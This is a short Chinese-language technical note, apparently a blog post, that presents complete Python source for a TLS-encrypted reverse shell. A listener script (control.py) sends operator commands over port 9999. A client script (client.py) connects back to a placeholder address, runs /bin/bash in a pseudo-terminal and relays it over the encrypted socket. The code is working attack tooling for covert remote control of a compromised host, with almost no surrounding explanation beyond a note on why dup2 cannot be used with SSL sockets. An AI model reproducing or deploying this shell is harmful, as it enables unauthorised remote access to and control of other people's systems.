可以使用dup2,因为通过fileno获得的文件描述符是内核表示形式。 如果使用ssl.wrap_socket,得到的sock是ssl用户空间包装。无法利用dup2,需要使用管道映射stdin/stdout到sock

python ssl sock 使用select的注意事项(stackoverflow): https://stackoverflow.com/questions/3187565/select-and-ssl-in-python

#control.py:

import socket
import ssl
import threading
import os

def create_ssl_socket():
    try:
        s = socket.socket()
        ssl_socket = ssl.wrap_socket(s, certfile='./server.crt', keyfile='./server.key', ssl_version=ssl.PROTOCOL_TLSv1)
    except BaseException as e:
        print(e)
        return False

    return ssl_socket

def bind_socket(ssl_socket,laddr,lport):
    ssl_socket.bind((laddr,lport))
    ssl_socket.listen(10)
    print("[*]SSL socket bind port: %d " % lport)

def client_accept(ssl_socket):
    print("[*]Waiting for client... ")
    client,addr = ssl_socket.accept()
    print("[+]Client has been connected , %s " % str(addr))
    threading.Thread(target=client_loop,args=(client,)).start()
    client_shell(client)

def client_loop(agent):
    while True:
        try:
            data = agent.recv(2048)
            if data == None or data == b'':
                print("[DEBUG] Exit client recv")
                agent.close()
                break
        except BaseException as e:
            print("[DEBUG] Exit client recv")
            agent.close()
            break
        print(data.decode())

def client_shell(client):
    while True:
        command = input("> ")
        command = command + "\\n"
        try:
            client.send(command.encode("utf-8"))
        except BaseException as e:
            print(e)
            break

if __name__ == "__main__":
    s = create_ssl_socket()
    if s == False:
        os._exit(0)

    bind_socket(s,'',9999)
    client_accept(s)
###client.py:

import os
import ssl
import socket
import subprocess
import pty
import select

def create_ssl_socket():
    try:
        s = socket.socket()
        ssls = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
    except BaseException as e:
        print(e)
        return False
    return ssls

if __name__ == "__main__":
    s = create_ssl_socket()
    s.connect(("ip addr", 9999))
    # Spawn a PTY
    master, slave = pty.openpty()
    # Run bash inside it
    bash = subprocess.Popen(["/bin/bash"],
                            preexec_fn=os.setsid,
                            stdin=slave,
                            stdout=slave,
                            stderr=slave,
                            universal_newlines=True)
    try:
        while bash.poll() is None:  # While bash is alive
            r, w, e = select.select([s, master], [], [])  # Wait for data on either the socket or the PTY
            if s in r:  # Reading data from the SSL socket
                try:
                    data = s.recv(1024)
                except ssl.SSLError as e:
                    if e.errno == ssl.SSL_ERROR_WANT_READ:
                        continue
                    raise
                if not data:  # End of file.
                    break
                data_left = s.pending()
                while data_left:
                    data += s.recv(data_left)
                    data_left = s.pending()
                os.write(master, data)
            elif master in r:  # Reading data from the PTY.
                s.write(os.read(master, 2048))
    finally:
        s.close()